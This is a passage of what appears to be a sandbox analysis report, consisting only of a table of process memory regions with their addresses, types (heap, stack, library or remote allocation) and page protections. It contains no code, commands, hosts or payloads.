trusted library allocation
|
page read and write
|
||
|
15D26B01000
|
trusted library allocation
|
page read and write
|
||
|
1F97D660000
|
heap
|
page read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
15D3EB14000
|
heap
|
page read and write
|
||
|
26D8B6A0000
|
heap
|
page read and write
|
||
|
21F63E90000
|
heap
|
page read and write
|
||
|
26D897A8000
|
heap
|
page read and write
|
||
|
1F97B820000
|
heap
|
page read and write
|
||
|
26D8B6BC000
|
heap
|
page read and write
|
||
|
5701A73000
|
stack
|
page read and write
|
||
|
1F97D726000
|
heap
|
page read and write
|
||
|
1F97D666000
|
heap
|
page read and write
|
||
|
26D8B88E000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
21F65D40000
|
heap
|
page read and write
|
||
|
26D8B73E000
|
heap
|
page read and write
|
||
|
286E6552000
|
trusted library allocation
|
page read and write
|
||
|
26D8B344000
|
heap
|
page read and write
|
||
|
286E601D000
|
trusted library allocation
|
page read and write
|
||
|
15D24C57000
|
heap
|
page read and write
|
||
|
21F63DB0000
|
heap
|
page read and write
|
||
|
1F97B95B000
|
heap
|
page read and write
|
||
|
21F65C10000
|
heap
|
page read and write
|
||
|
26D898A2000
|
heap
|
page read and write
|
||
|
21F66024000
|
heap
|
page read and write
|
||
|
2459F07E000
|
heap
|
page read and write
|
||
|
21F65C0A000
|
heap
|
page read and write
|
||
|
26D8B716000
|
heap
|
page read and write
|
||
|
15D26BD5000
|
trusted library allocation
|
page read and write
|
||
|
1F97D735000
|
heap
|
page read and write
|
||
|
26D8B69F000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
21F669B4000
|
heap
|
page read and write
|
||
|
1F97D904000
|
heap
|
page read and write
|
||
|
1F97D665000
|
heap
|
page read and write
|
||
|
15D3ECC0000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F97B95A000
|
heap
|
page read and write
|
||
|
7DF4D2DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848BE4000
|
trusted library allocation
|
page read and write
|
||
|
245A690C000
|
trusted library allocation
|
page read and write
|
||
|
21F65C9B000
|
heap
|
page read and write
|
||
|
1F97B95A000
|
heap
|
page read and write
|
||
|
21F66013000
|
heap
|
page read and write
|
||
|
245A0EB1000
|
heap
|
page read and write
|
||
|
1F97D85E000
|
heap
|
page read and write
|
||
|
21F65FA0000
|
heap
|
page read and write
|
||
|
72917E000
|
stack
|
page read and write
|
||
|
21F668E4000
|
heap
|
page read and write
|
||
|
1F97D71A000
|
heap
|
page read and write
|
||
|
245A28CC000
|
trusted library allocation
|
page read and write
|
||
|
21F6605B000
|
heap
|
page read and write
|
||
|
286E57E0000
|
heap
|
page execute and read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
2459F09F000
|
heap
|
page read and write
|
||
|
2459F052000
|
heap
|
page read and write
|
||
|
26D8B756000
|
heap
|
page read and write
|
||
|
2459F010000
|
heap
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
1F97D68A000
|
heap
|
page read and write
|
||
|
1F97D735000
|
heap
|
page read and write
|
||
|
3A3B1FE000
|
stack
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
2459EFA0000
|
heap
|
page read and write
|
||
|
886987E000
|
stack
|
page read and write
|
||
|
26D8B6A6000
|
heap
|
page read and write
|
||
|
15D26AB1000
|
trusted library allocation
|
page read and write
|
||
|
286E3FB1000
|
heap
|
page read and write
|
||
|
1F97F1CA000
|
heap
|
page read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
286FE059000
|
heap
|
page read and write
|
||
|
1F97D6D0000
|
heap
|
page read and write
|
||
|
1F97B88D000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
15D24C10000
|
heap
|
page read and write
|
||
|
1F97D677000
|
heap
|
page read and write
|
||
|
1F97D665000
|
heap
|
page read and write
|
||
|
286E5CE4000
|
trusted library allocation
|
page read and write
|
||
|
286E3E40000
|
heap
|
page read and write
|
||
|
245A756A000
|
trusted library allocation
|
page read and write
|
||
|
26D8B732000
|
heap
|
page read and write
|
||
|
15D36AB1000
|
trusted library allocation
|
page read and write
|
||
|
728DB3000
|
stack
|
page read and write
|
||
|
2459EFD0000
|
heap
|
page read and write
|
||
|
1F97B8B0000
|
heap
|
page read and write
|
||
|
26D8B6B0000
|
heap
|
page read and write
|
||
|
21F65BF2000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
26D898CE000
|
heap
|
page read and write
|
||
|
3A3ADFE000
|
stack
|
page read and write
|
||
|
286E3F48000
|
heap
|
page read and write
|
||
|
245A10F2000
|
trusted library allocation
|
page read and write
|
||
|
21F66013000
|
heap
|
page read and write
|
||
|
26D8B890000
|
heap
|
page read and write
|
||
|
26D89800000
|
heap
|
page read and write
|
||
|
570233C000
|
stack
|
page read and write
|
||
|
1F97B888000
|
heap
|
page read and write
|
||
|
26D8B72A000
|
heap
|
page read and write
|
||
|
15D26BD9000
|
trusted library allocation
|
page read and write
|
||
|
1F97F1C0000
|
heap
|
page read and write
|
||
|
7292FE000
|
stack
|
page read and write
|
||
|
7FF848C9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F97D680000
|
heap
|
page read and write
|
||
|
1F97F4F0000
|
trusted library allocation
|
page read and write
|
||
|
15D24C18000
|
heap
|
page read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
15D26C06000
|
trusted library allocation
|
page read and write
|
||
|
1F97D310000
|
heap
|
page read and write
|
||
|
5701E7E000
|
stack
|
page read and write
|
||
|
21F65BFE000
|
heap
|
page read and write
|
||
|
15D26F30000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6C3000
|
heap
|
page read and write
|
||
|
21F65BF4000
|
heap
|
page read and write
|
||
|
15D271CE000
|
trusted library allocation
|
page read and write
|
||
|
1F97D6F0000
|
heap
|
page read and write
|
||
|
21F65C48000
|
heap
|
page read and write
|
||
|
26D89830000
|
heap
|
page read and write
|
||
|
21F66997000
|
heap
|
page read and write
|
||
|
21F6699D000
|
heap
|
page read and write
|
||
|
5701DFE000
|
stack
|
page read and write
|
||
|
1F97D689000
|
heap
|
page read and write
|
||
|
21F65FEC000
|
heap
|
page read and write
|
||
|
286E5910000
|
heap
|
page read and write
|
||
|
57022BE000
|
stack
|
page read and write
|
||
|
15D26A90000
|
heap
|
page execute and read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
21F669B5000
|
heap
|
page read and write
|
||
|
26D8B741000
|
heap
|
page read and write
|
||
|
21F65C3E000
|
heap
|
page read and write
|
||
|
1F97B962000
|
heap
|
page read and write
|
||
|
15D3EAC2000
|
heap
|
page read and write
|
||
|
1F97B96A000
|
heap
|
page read and write
|
||
|
26D898D3000
|
heap
|
page read and write
|
||
|
21F65BFE000
|
heap
|
page read and write
|
||
|
5702D8D000
|
stack
|
page read and write
|
||
|
21F65C11000
|
heap
|
page read and write
|
||
|
21F6601E000
|
heap
|
page read and write
|
||
|
15D3EBD2000
|
heap
|
page read and write
|
||
|
7297FE000
|
stack
|
page read and write
|
||
|
88698FB000
|
stack
|
page read and write
|
||
|
15D24BF0000
|
heap
|
page read and write
|
||
|
7FF848D91000
|
trusted library allocation
|
page read and write
|
||
|
21F65BF5000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
21F65FA6000
|
heap
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
286E5760000
|
heap
|
page read and write
|
||
|
26D898DB000
|
heap
|
page read and write
|
||
|
21F65C05000
|
heap
|
page read and write
|
||
|
21F668F0000
|
heap
|
page read and write
|
||
|
1F97F1CE000
|
heap
|
page read and write
|
||
|
26D8B735000
|
heap
|
page read and write
|
||
|
15D24B80000
|
heap
|
page read and write
|
||
|
26D8982A000
|
heap
|
page read and write
|
||
|
286FE000000
|
heap
|
page execute and read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
21F669BE000
|
heap
|
page read and write
|
||
|
21F65BFC000
|
heap
|
page read and write
|
||
|
1F97B8CA000
|
heap
|
page read and write
|
||
|
286F5CD3000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6AB000
|
heap
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F66751000
|
heap
|
page read and write
|
||
|
7FF848C04000
|
trusted library allocation
|
page read and write
|
||
|
15D3EABC000
|
heap
|
page read and write
|
||
|
21F6607E000
|
heap
|
page read and write
|
||
|
AF3B5FE000
|
stack
|
page read and write
|
||
|
21F65C02000
|
heap
|
page read and write
|
||
|
245A14CC000
|
trusted library allocation
|
page read and write
|
||
|
245A410C000
|
trusted library allocation
|
page read and write
|
||
|
1F97D682000
|
heap
|
page read and write
|
||
|
26D8B6B0000
|
heap
|
page read and write
|
||
|
26D898D3000
|
heap
|
page read and write
|
||
|
26D8B88D000
|
heap
|
page read and write
|
||
|
21F65D80000
|
remote allocation
|
page read and write
|
||
|
C52FBFF000
|
stack
|
page read and write
|
||
|
1F97B8BF000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
286E5880000
|
heap
|
page read and write
|
||
|
21F65FA6000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
21F6601E000
|
heap
|
page read and write
|
||
|
21F65C17000
|
heap
|
page read and write
|
||
|
245B1080000
|
trusted library allocation
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
1F97D670000
|
heap
|
page read and write
|
||
|
286FDD70000
|
heap
|
page read and write
|
||
|
1F97D669000
|
heap
|
page read and write
|
||
|
7291FE000
|
stack
|
page read and write
|
||
|
5702D0E000
|
stack
|
page read and write
|
||
|
15D26EE7000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D24CBB000
|
heap
|
page read and write
|
||
|
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
|
5701B7F000
|
stack
|
page read and write
|
||
|
26D8B310000
|
heap
|
page read and write
|
||
|
C52FDFE000
|
stack
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
5701F3F000
|
stack
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
728DFE000
|
stack
|
page read and write
|
||
|
21F65BFC000
|
heap
|
page read and write
|
||
|
21F65C3E000
|
heap
|
page read and write
|
||
|
26D89820000
|
heap
|
page read and write
|
||
|
7FF848C0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F97D73E000
|
heap
|
page read and write
|
||
|
7FF848D82000
|
trusted library allocation
|
page read and write
|
||
|
1F97B96A000
|
heap
|
page read and write
|
||
|
1F97D314000
|
heap
|
page read and write
|
||
|
286E6160000
|
trusted library allocation
|
page read and write
|
||
|
2459F08D000
|
heap
|
page read and write
|
||
|
570223E000
|
stack
|
page read and write
|
||
|
15D24BB0000
|
trusted library allocation
|
page read and write
|
||
|
21F65C9B000
|
heap
|
page read and write
|
||
|
5702E0B000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D3EB83000
|
heap
|
page read and write
|
||
|
21F669D2000
|
heap
|
page read and write
|
||
|
72907F000
|
stack
|
page read and write
|
||
|
1F97D66F000
|
heap
|
page read and write
|
||
|
15D26B4C000
|
trusted library allocation
|
page read and write
|
||
|
88696FE000
|
stack
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
21F66716000
|
heap
|
page read and write
|
||
|
3A3B0FB000
|
stack
|
page read and write
|
||
|
245A1467000
|
trusted library allocation
|
page read and write
|
||
|
286E3EFD000
|
heap
|
page read and write
|
||
|
3A3AEFE000
|
stack
|
page read and write
|
||
|
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D8D205000
|
heap
|
page read and write
|
||
|
26D898DB000
|
heap
|
page read and write
|
||
|
26D898DB000
|
heap
|
page read and write
|
||
|
15D26C1F000
|
trusted library allocation
|
page read and write
|
||
|
1F97B96A000
|
heap
|
page read and write
|
||
|
2459F0C8000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
245A7566000
|
trusted library allocation
|
page read and write
|
||
|
21F65BF1000
|
heap
|
page read and write
|
||
|
7293FE000
|
stack
|
page read and write
|
||
|
21F669C3000
|
heap
|
page read and write
|
||
|
21F65C3B000
|
heap
|
page read and write
|
||
|
21F667E0000
|
heap
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
7FF848CE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F65FAF000
|
heap
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
|
5701FB7000
|
stack
|
page read and write
|
||
|
21F65E20000
|
heap
|
page read and write
|
||
|
2459F030000
|
heap
|
page read and write
|
||
|
1F97B840000
|
heap
|
page read and write
|
||
|
1F97D69F000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
1F97D662000
|
heap
|
page read and write
|
||
|
15D24BA0000
|
heap
|
page readonly
|
||
|
286E3E60000
|
heap
|
page read and write
|
||
|
15D3EB12000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
1F97B93D000
|
heap
|
page read and write
|
||
|
21F65D80000
|
remote allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
8869679000
|
stack
|
page read and write
|
||
|
26D8B701000
|
heap
|
page read and write
|
||
|
1F97D85C000
|
heap
|
page read and write
|
||
|
26D89780000
|
heap
|
page read and write
|
||
|
15D26B49000
|
trusted library allocation
|
page read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
26D8B6DC000
|
heap
|
page read and write
|
||
|
1F97D860000
|
heap
|
page read and write
|
||
|
1F97B958000
|
heap
|
page read and write
|
||
|
1F97D85C000
|
heap
|
page read and write
|
||
|
26D8B746000
|
heap
|
page read and write
|
||
|
26D898B2000
|
heap
|
page read and write
|
||
|
15D24B60000
|
trusted library allocation
|
page read and write
|
||
|
7290FE000
|
stack
|
page read and write
|
||
|
286E5914000
|
heap
|
page read and write
|
||
|
8868FDE000
|
stack
|
page read and write
|
||
|
2459F034000
|
heap
|
page read and write
|
||
|
1F97D662000
|
heap
|
page read and write
|
||
|
26D898D3000
|
heap
|
page read and write
|
||
|
21F63EE0000
|
heap
|
page read and write
|
||
|
2459F0CB000
|
heap
|
page read and write
|
||
|
26D898D5000
|
heap
|
page read and write
|
||
|
26D8B88C000
|
heap
|
page read and write
|
||
|
245A730C000
|
trusted library allocation
|
page read and write
|
||
|
21F63DB7000
|
heap
|
page read and write
|
||
|
245A550C000
|
trusted library allocation
|
page read and write
|
||
|
15D24BC0000
|
heap
|
page read and write
|
||
|
26D8B721000
|
heap
|
page read and write
|
||
|
21F6605B000
|
heap
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
245A148D000
|
trusted library allocation
|
page read and write
|
||
|
3A3A7A4000
|
stack
|
page read and write
|
||
|
1F97D861000
|
heap
|
page read and write
|
||
|
26D8B7F3000
|
heap
|
page read and write
|
||
|
21F65C16000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
1F97D666000
|
heap
|
page read and write
|
||
|
21F66602000
|
heap
|
page read and write
|
||
|
15D24AC0000
|
heap
|
page read and write
|
||
|
7FF848CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F66087000
|
heap
|
page read and write
|
||
|
7296FE000
|
stack
|
page read and write
|
||
|
26D8B74A000
|
heap
|
page read and write
|
||
|
15D24B20000
|
heap
|
page read and write
|
||
|
1F97D6D5000
|
heap
|
page read and write
|
||
|
26D8B6D4000
|
heap
|
page read and write
|
||
|
15D24BE7000
|
heap
|
page read and write
|
||
|
286FE06D000
|
heap
|
page read and write
|
||
|
286FDE03000
|
heap
|
page read and write
|
||
|
1F97B889000
|
heap
|
page read and write
|
||
|
26D8B791000
|
heap
|
page read and write
|
||
|
15D26E89000
|
trusted library allocation
|
page read and write
|
||
|
1F97D701000
|
heap
|
page read and write
|
||
|
26D898C9000
|
heap
|
page read and write
|
||
|
26D898A2000
|
heap
|
page read and write
|
||
|
15D26BC9000
|
trusted library allocation
|
page read and write
|
||
|
1F97D73F000
|
heap
|
page read and write
|
||
|
286E3F44000
|
heap
|
page read and write
|
||
|
245A2D0C000
|
trusted library allocation
|
page read and write
|
||
|
26D897A0000
|
heap
|
page read and write
|
||
|
1F97D68C000
|
heap
|
page read and write
|
||
|
245A5F0C000
|
trusted library allocation
|
page read and write
|
||
|
245B136C000
|
trusted library allocation
|
page read and write
|
||
|
21F668E1000
|
heap
|
page read and write
|
||
|
15D26E5C000
|
trusted library allocation
|
page read and write
|
||
|
1F97D744000
|
heap
|
page read and write
|
||
|
26D898D1000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
26D8B88C000
|
heap
|
page read and write
|
||
|
21F668E1000
|
heap
|
page read and write
|
||
|
1F97D761000
|
heap
|
page read and write
|
||
|
15D249E0000
|
heap
|
page read and write
|
||
|
15D27008000
|
trusted library allocation
|
page read and write
|
||
|
8869577000
|
stack
|
page read and write
|
||
|
26D8B76E000
|
heap
|
page read and write
|
||
|
15D3F0B0000
|
heap
|
page read and write
|
||
|
26D8B774000
|
heap
|
page read and write
|
||
|
1F97B96E000
|
heap
|
page read and write
|
||
|
21F65C02000
|
heap
|
page read and write
|
||
|
26D898CB000
|
heap
|
page read and write
|
||
|
88693FE000
|
stack
|
page read and write
|
||
|
21F66024000
|
heap
|
page read and write
|
||
|
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
|
21F6608E000
|
heap
|
page read and write
|
||
|
7FF848BED000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F66999000
|
heap
|
page read and write
|
||
|
21F658A0000
|
heap
|
page read and write
|
||
|
21F6608E000
|
heap
|
page read and write
|
||
|
26D8982F000
|
heap
|
page read and write
|
||
|
2459EFB0000
|
heap
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
5701AFD000
|
stack
|
page read and write
|
||
|
21F6607D000
|
heap
|
page read and write
|
||
|
88695F8000
|
stack
|
page read and write
|
||
|
1F97B960000
|
heap
|
page read and write
|
||
|
26D8B6F1000
|
heap
|
page read and write
|
||
|
21F65F80000
|
heap
|
page read and write
|
||
|
15D3EAB0000
|
heap
|
page read and write
|
||
|
1F97D6A7000
|
heap
|
page read and write
|
||
|
8868F1F000
|
unkown
|
page read and write
|
||
|
286E5C7D000
|
trusted library allocation
|
page read and write
|
||
|
1F97D67B000
|
heap
|
page read and write
|
||
|
15D271E4000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
26D8B6D7000
|
heap
|
page read and write
|
||
|
21F65FBC000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
286E5C61000
|
trusted library allocation
|
page read and write
|
||
|
15D26AA0000
|
heap
|
page read and write
|
||
|
1F97D710000
|
heap
|
page read and write
|
||
|
26D8B765000
|
heap
|
page read and write
|
||
|
21F65BF2000
|
heap
|
page read and write
|
||
|
21F65C2B000
|
heap
|
page read and write
|
||
|
21F63E14000
|
heap
|
page read and write
|
||
|
1F97B95F000
|
heap
|
page read and write
|
||
|
7FF848DB1000
|
trusted library allocation
|
page read and write
|
||
|
286E6108000
|
trusted library allocation
|
page read and write
|
||
|
15D27073000
|
trusted library allocation
|
page read and write
|
||
|
570213E000
|
stack
|
page read and write
|
||
|
3A3AFFE000
|
stack
|
page read and write
|
||
|
21F65855000
|
heap
|
page read and write
|
||
|
886947F000
|
stack
|
page read and write
|
||
|
26D898DB000
|
heap
|
page read and write
|
||
|
1F97D698000
|
heap
|
page read and write
|
||
|
1F97B890000
|
heap
|
page read and write
|
||
|
1F97B8CE000
|
heap
|
page read and write
|
||
|
21F66600000
|
heap
|
page read and write
|
||
|
1F97D732000
|
heap
|
page read and write
|
||
|
1F97D85E000
|
heap
|
page read and write
|
||
|
21F66013000
|
heap
|
page read and write
|
||
|
15D3EBB0000
|
heap
|
page read and write
|
||
|
7FF848DBA000
|
trusted library allocation
|
page read and write
|
||
|
21F65C65000
|
heap
|
page read and write
|
||
|
26D8B6B0000
|
heap
|
page read and write
|
||
|
26D8982A000
|
heap
|
page read and write
|
||
|
21F65FA7000
|
heap
|
page read and write
|
||
|
21F65C14000
|
heap
|
page read and write
|
||
|
21F6605B000
|
heap
|
page read and write
|
||
|
21F66997000
|
heap
|
page read and write
|
||
|
286E3D60000
|
heap
|
page read and write
|
||
|
15D27033000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D9A000
|
trusted library allocation
|
page read and write
|
||
|
15D3EACD000
|
heap
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
286E5D64000
|
trusted library allocation
|
page read and write
|
||
|
21F668E0000
|
heap
|
page read and write
|
||
|
286FDE70000
|
heap
|
page execute and read and write
|
||
|
1F97D682000
|
heap
|
page read and write
|
||
|
245A148B000
|
trusted library allocation
|
page read and write
|
||
|
26D898D0000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
5701CFD000
|
stack
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
245B1D6C000
|
trusted library allocation
|
page read and write
|
||
|
1F97D6B3000
|
heap
|
page read and write
|
||
|
21F669B4000
|
heap
|
page read and write
|
||
|
286FDD8A000
|
heap
|
page read and write
|
||
|
1F97B931000
|
heap
|
page read and write
|
||
|
21F66622000
|
heap
|
page read and write
|
||
|
21F6601E000
|
heap
|
page read and write
|
||
|
245A1060000
|
heap
|
page execute and read and write
|
||
|
286E3EC0000
|
heap
|
page read and write
|
||
|
286E5CBD000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C03000
|
trusted library allocation
|
page execute and read and write
|
||
|
245A1457000
|
trusted library allocation
|
page read and write
|
||
|
15D24C52000
|
heap
|
page read and write
|
||
|
26D897A5000
|
heap
|
page read and write
|
||
|
21F666DF000
|
heap
|
page read and write
|
||
|
2459F0C6000
|
heap
|
page read and write
|
||
|
2459F067000
|
heap
|
page read and write
|
||
|
21F669B4000
|
heap
|
page read and write
|
||
|
286E60E6000
|
trusted library allocation
|
page read and write
|
||
|
26D8B709000
|
heap
|
page read and write
|
||
|
245A370C000
|
trusted library allocation
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
1F97D669000
|
heap
|
page read and write
|
||
|
88692FD000
|
stack
|
page read and write
|
||
|
286E57C0000
|
heap
|
page readonly
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
1F97D6F9000
|
heap
|
page read and write
|
||
|
1F97B972000
|
heap
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
286F5C6F000
|
trusted library allocation
|
page read and write
|
||
|
15D24C0A000
|
heap
|
page read and write
|
||
|
26D898D6000
|
heap
|
page read and write
|
||
|
286E3F09000
|
heap
|
page read and write
|
||
|
1F97D68B000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
C5300FE000
|
stack
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
15D24C12000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
286E3EB0000
|
heap
|
page read and write
|
||
|
26D8983D000
|
heap
|
page read and write
|
||
|
AF3BBFF000
|
stack
|
page read and write
|
||
|
1F97B885000
|
heap
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
1F97B941000
|
heap
|
page read and write
|
||
|
7FF848CC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
245A0B60000
|
heap
|
page read and write
|
||
|
26D8B6A5000
|
heap
|
page read and write
|
||
|
245A0B64000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6C8000
|
heap
|
page read and write
|
||
|
57021BE000
|
stack
|
page read and write
|
||
|
245A1463000
|
trusted library allocation
|
page read and write
|
||
|
286E5D75000
|
trusted library allocation
|
page read and write
|
||
|
286FDE08000
|
heap
|
page read and write
|
||
|
15D24C74000
|
heap
|
page read and write
|
||
|
21F661E0000
|
trusted library allocation
|
page read and write
|
||
|
C52FFFE000
|
stack
|
page read and write
|
||
|
15D24D40000
|
heap
|
page execute and read and write
|
||
|
C52F738000
|
stack
|
page read and write
|
||
|
286FE2F0000
|
heap
|
page read and write
|
||
|
7FF848C02000
|
trusted library allocation
|
page read and write
|
||
|
1F97B965000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
1F97B962000
|
heap
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
88694F9000
|
stack
|
page read and write
|
||
|
1F97B962000
|
heap
|
page read and write
|
||
|
245A1455000
|
trusted library allocation
|
page read and write
|
||
|
72927C000
|
stack
|
page read and write
|
||
|
1F97D682000
|
heap
|
page read and write
|
||
|
21F65C0E000
|
heap
|
page read and write
|
||
|
21F669D2000
|
heap
|
page read and write
|
||
|
21F63EF0000
|
heap
|
page read and write
|
||
|
1F97B964000
|
heap
|
page read and write
|
||
|
7FF848CB6000
|
trusted library allocation
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
21F63DDF000
|
heap
|
page read and write
|
||
|
21F63DE0000
|
heap
|
page read and write
|
||
|
3A3AAFE000
|
stack
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
26D8B759000
|
heap
|
page read and write
|
||
|
26D8983F000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
26D8B6AB000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
21F66997000
|
heap
|
page read and write
|
||
|
21F63E21000
|
heap
|
page read and write
|
||
|
1F97D669000
|
heap
|
page read and write
|
||
|
26D8B6C2000
|
heap
|
page read and write
|
||
|
1F97B95E000
|
heap
|
page read and write
|
||
|
886977E000
|
stack
|
page read and write
|
||
|
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
1F97F1C9000
|
heap
|
page read and write
|
||
|
26D898AD000
|
heap
|
page read and write
|
||
|
570203C000
|
stack
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
1F97D74F000
|
heap
|
page read and write
|
||
|
21F65BFE000
|
heap
|
page read and write
|
||
|
21F669DA000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1F97D6D8000
|
heap
|
page read and write
|
||
|
15D24C87000
|
heap
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
245B276C000
|
trusted library allocation
|
page read and write
|
||
|
21F669B4000
|
heap
|
page read and write
|
||
|
15D24B88000
|
heap
|
page read and write
|
||
|
15D26F0C000
|
trusted library allocation
|
page read and write
|
||
|
15D24B86000
|
heap
|
page read and write
|
||
|
1F97D669000
|
heap
|
page read and write
|
||
|
26D897A8000
|
heap
|
page read and write
|
||
|
15D3EB6C000
|
heap
|
page read and write
|
||
|
21F66607000
|
heap
|
page read and write
|
||
|
1F97B88E000
|
heap
|
page read and write
|
||
|
26D8B6B0000
|
heap
|
page read and write
|
||
|
245A0AB0000
|
heap
|
page read and write
|
||
|
1F97D716000
|
heap
|
page read and write
|
||
|
26D898CC000
|
heap
|
page read and write
|
||
|
26D8B699000
|
heap
|
page read and write
|
||
|
886A2CE000
|
stack
|
page read and write
|
||
|
21F65FA0000
|
heap
|
page read and write
|
||
|
15D26A60000
|
heap
|
page execute and read and write
|
||
|
26D8B74D000
|
heap
|
page read and write
|
||
|
26D8B6BB000
|
heap
|
page read and write
|
||
|
21F63EE5000
|
heap
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
3A3ABFE000
|
stack
|
page read and write
|
||
|
57020B9000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
26D897AD000
|
heap
|
page read and write
|
||
|
21F669B0000
|
heap
|
page read and write
|
||
|
26D8B691000
|
heap
|
page read and write
|
||
|
26D8983B000
|
heap
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
26D8B6B0000
|
heap
|
page read and write
|
||
|
26D8D4F0000
|
trusted library allocation
|
page read and write
|
||
|
26D8B935000
|
heap
|
page read and write
|
||
|
21F66999000
|
heap
|
page read and write
|
||
|
21F63DEF000
|
heap
|
page read and write
|
||
|
21F65BF6000
|
heap
|
page read and write
|
||
|
1F97D746000
|
heap
|
page read and write
|
||
